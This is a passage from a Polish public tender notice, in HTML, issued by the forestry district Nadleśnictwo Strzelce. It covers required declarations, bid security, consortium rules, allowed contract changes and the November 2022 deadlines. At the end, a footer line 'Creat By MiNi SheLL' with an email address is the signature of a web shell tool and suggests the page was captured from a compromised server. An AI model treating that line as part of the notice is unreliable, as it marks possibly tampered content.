techniczne lub zawodowe, pozwolą na wykazanie przez Wykonawcę spełnienia warunków udziału w postępowaniu, o których mowa w SWZ, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od wykonawców przedłożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> .Do wypełnionego formularza ofertowego należy dołączyć oświadczenie wymienione w dziale IX ust.1według wzoru zał. nr 2 do SWZ;<br/> oświadczenie o braku podstaw do wykluczenia z art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (zał. nr 13 do SWZ);<br/> w przypadku podpisywania oferty, oświadczeń i dokumentów przez inne osoby niż wskazane w odpowiednim rejestrze lub<br/>ewidencji i informacji o działalności gospodarczej, do oferty należy dołączyć w oryginale pełnomocnictwo dla tych osób,<br/>podpisane przez osoby upoważnione do reprezentowania Wykonawcy, lub kopii poświadczonej za zgodność z oryginałem<br/>przez notariusza,<br/> pełnomocnictwo dla pełnomocnika ustanowionego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>pełnomocnictwo powinno być załączone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza,<br/> informacja dot. tajemnicy przedsiębiorstwa - pisemne uzasadnienie (jeśli dotyczy)<br/> kosztorys ofertowy sporządzony według własnego wzoru na podstawie przedmiaru robót<br/> dowód wniesienia wadium<br/> zobowiązanie podmiotu udostępniającego potencjał (jeśli dotyczy wg załącznika nr 5 do SWZ),<br/> oświadczenie, sporządzone zgodnie ze wzorem stanowiącym załącznik nr 12 do SWZ, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby/osób<br/>upoważnionych do reprezentacji podmiotu udostępniającego Wykonawcy zasoby na zasadzie określonej w art. 118 w zw. z<br/>125 ust.5 i art. 266 PZP, o ile dotyczy.<br/>Dokumenty składane wraz z ofertą, w tym pełnomocnictwa powinny zostać sporządzone w sposób określony w<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23.12.2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r., poz. 2415). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Oferta powinna być zabezpieczona wadium w wysokości 4.000zł<br/>2.	Wadium może być wniesione w następujących formach:<br/>2.1	pieniądzu,<br/>2.2	gwarancjach bankowych,<br/>2.3	gwarancjach ubezpieczeniowych,<br/>2.4	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2020 r., poz. 299 ze zm.).<br/>3.	Wadium powinno być wniesione przed upływem terminu składania ofert. <br/>4.	Wadium w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego prowadzony w banku PKO BP 15 1020 5356 0000 1802 0210 1228 Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli znajdzie się na rachunku bankowym zamawiającego przed upływem terminu składania ofert. Dowód potwierdzający wpłatę (wniesienia) wadium należy dołączyć do oferty.<br/>5.	Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej, tj. opatrzonej kwalifikowanym podpisem elektronicznymi osób upoważnionych do jego wystawienia i pełnić co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadku powodujące utratę wadium przez Wykonawcę określone w ustawie PZP;<br/>2)	z jej treści powinno jednoznacznie wynikać zobowiązanie do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składnia ofert);<br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6)	beneficjentem poręczenia lub gwarancji jest Nadleśnictwo Strzelce.<br/>6.	Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwalnie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Pzp zostanie odrzucona. <br/>7.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> przypadku wspólnego ubiegania się o zamówienie na zasadach określonych w art. 58 ustawy Pzp, wykonawcy muszą<br/>łącznie wykazać spełnienie warunków uczestnictwa, o których mowa w ust 1 pkt 1.3 - 1.4 powyżej. Żaden z Wykonawcówwspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. Oświadczenie o<br/>którym mowa w dziale IX pkt 1, składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia. 2.W<br/>przypadku oferty wspólnej żaden z wykonawców ubiegający się wspólnie o zamówienie nie może podlegać wykluczeniu z<br/>postępowania na podstawie art. 108 ust.1 i 109 ust. 1,4 i 7 Pzp i art. 7 ust. 1 ustawy a dnia 13.04.2022r. (Dz.U. z 2022r. poz.<br/>835). Wykonawcy ustanawiają pełnomocnika (Lidera- partnera wiodącego) i składają pełnomocnika (Lidera), z którego treści<br/>będzie wynikał zakres umocowania i równocześnie będzie ono potwierdzeniem solidarnej odpowiedzialności podmiotów za<br/>realizację przedmiotu zamówienia. Do SWZ został dołączony, do wykorzystania wzór pełnomocnictwa – (zał. nr 6).<br/>Pełnomocnictwo musi być zgodne z umową konsorcjum.<br/>Wszystkie dokumenty oferty wspólnej, z wyjątkiem oświadczenia wykonawcy o spełnieniu warunków udziału w<br/>postępowaniu i oświadczeniu o braku podstaw do wykluczenia, oraz informacji o przynależności do grupy kapitałowej<br/>podpisuje pełnomocnik (Lider), natomiast w miejsce pieczęci firmy wpisuje się nazwę np. konsorcjum. Oświadczenie<br/>wykonawcy o spełnieniu warunków oraz oświadczenie o braku podstaw do wykluczenia z udziału w postępowaniu, a także<br/>informacja o przynależności do grupy kapitałowej, mogą być podpisane osobiście przez wykonawcę lub w imieniu<br/>wykonawcy przez pełnomocnika (Lidera), jeżeli został on upoważniony do wykonania tej czynności. Rozliczenie<br/>wynagrodzenia należnego członkom konsorcjum za wykonanie zamówienia oparte będzie na zasadach solidarności<br/>wierzycieli, co oznacza, że Zamawiający uprawniony będzie do spełnienia swojego świadczenia na rzecz jednego z<br/>członków konsorcjum ze skutkiem wygaśnięcia długu w stosunku do pozostałych członków konsorcjum [solidarność<br/>wierzycieli w rozumieniu przepisu art. 367 kodeksu cywilnego]. Wszelka korespondencja będzie prowadzona z<br/>pełnomocnikiem.<br/>Wspólnicy spółki cywilnej będą traktowani jak wykonawcy składający ofertę wspólną <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Możliwe zmiany w umowie:<br/>1. Zmiana terminu realizacji przedmiotu umowy – zgodnie z §9 niniejszej umowy.<br/>2. Zmiana osób realizujących przedmiot umowy, wskazanych w ofercie Wykonawcy, w<br/>szczególności osoby kierownika budowy może być dokonana w sytuacji:<br/>1) na żądanie Zamawiającego w przypadku nienależytego wykonania powierzonych prac;<br/>2) na wniosek Wykonawcy w przypadku: − śmierci, choroby lub innego zdarzenia losowego,<br/>nienależytego wykonywania powierzonych prac, − innych obiektywnych okoliczności<br/>niezależnych od Wykonawcy (np. rezygnacji).<br/>3. Zmiana osoby pełniącej nadzór z ramienia Zamawiającego, może być dokonana w<br/>przypadku: − śmierci, choroby lub innego zdarzenia losowego, nienależytego wykonywania<br/>powierzonych prac oraz w przypadku innych obiektywnych okoliczności niezależnych od<br/>Zamawiającego (np. rezygnacji).<br/>4.Zmiana zakresu robót będzie możliwa w sytuacji:<br/>1) konieczności wykonania robót dodatkowych lub zamiennych w stosunku do przewidzianych<br/>dokumentacją projektową, gdy wykonanie tych robót będzie niezbędne do prawidłowego ich<br/>wykonania , tj. wykonania zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień<br/>odbioru robót przepisami, wykonania przedmiotu umowy i uzyskania założonego efektu<br/>użytkowego;<br/>2) konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań<br/>technicznych/technologicznych niż wskazane w dokumentacji projektowej, gdyby zastosowanie<br/>przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotuumowy;<br/>3) wystąpienia odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w<br/>szczególności istnienia podziemnych urządzeń, instalacji itp.;<br/>4) gdy wykonanie danych robót będzie zbędne lub konieczne do prawidłowego wykonania, tj.<br/>wykonania zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót<br/>przepisami, wykonania przedmiotu umowy;<br/>5) wprowadzenia zmian istotnych lub nieistotnych w dokumentacji projektowej w rozumieniu<br/>Prawa budowlanego.<br/>5. Zmiana wynagrodzenia w przypadkach :<br/>a) ograniczenia zakresu robót budowlanych ,<br/>b) określonych w § 2 ust. 22 umowy.<br/>Konieczność zmiany Umowy może być spowodowana okolicznościami, których Zamawiający,<br/>działając z należytą starannością, nie mógł przewidzieć oraz wartość zmiany nie przekracza<br/>50% wynagrodzenia umownego. Zmiany, o których mowa powyżej nie mogą powodować<br/>wykroczenia poza określenie przedmiotu zamówienia zawarte w Umowie, jak również nie mogą<br/>powodować obejścia przepisu art. 455 Pzp. Poza przypadkami określonymi w umowie zmiany<br/>umowy będą mogły nastąpić także w przypadku: zaistnienia omyłki pisarskiej lub rachunkowej.<br/>Strony umowy są uprawnione do wprowadzenia do umowy zmian nieistotnych, tj. innych, niż<br/>zmiany zdefiniowane w art. 454 ust. ustawy Pzp.<br/>Warunki zmiany umowy:<br/>1) inicjowanie zmian – na uzasadniony wniosek Wykonawcy lub Zamawiającego,<br/>2) zgoda obu stron,<br/>3) forma zmian – podpisany przez umocowanych przedstawicieli Zamawiającego i Wykonawcy -<br/>aneks do umowy w formie pisemnej, pod rygorem nieważności.<br/>6.W razie wątpliwości, przyjmuje się, że nie stanowią zmiany niniejszej umowy następujące<br/>zmiany:<br/>1) danych związanych z obsługą administracyjno-organizacyjną umowy,<br/>2) danych teleadresowych,<br/>3) danych rejestrowych,<br/>4) zaistnienia omyłki pisarskiej lub rachunkowej.<br/>7. W przypadku wystąpienia okoliczności, o których mowa powyżej , termin wykonania umowy<br/>może ulec odpowiedniemu przedłużeniu, jednakże o czas nie dłuższy niż okres trwania tych<br/>okoliczności.<br/>Warunkiem podpisania aneksu na przedłużony termin wykonania przedmiotu umowy będzie<br/>zachowanie ciągłości zabezpieczenia o których mowa § 4 umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-17 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma ezmowienia na adres https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d5b55752-5a9d11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-17 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> . Przedmiot zamówienia winien być wykonany w terminie do dnia 30 czerwca 2023r. część zadania musi być wykonana w roku 2022 – o wartości minimum 180 tys. zł. Zamawiający dopuszcza możliwość wcześniejszej realizacji zadania.<br/>2. Szczegółowe zagadnienia dotyczące terminu realizacji umowy uregulowane są we<br/>wzorze umowy stanowiącej załącznik nr 7 do SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com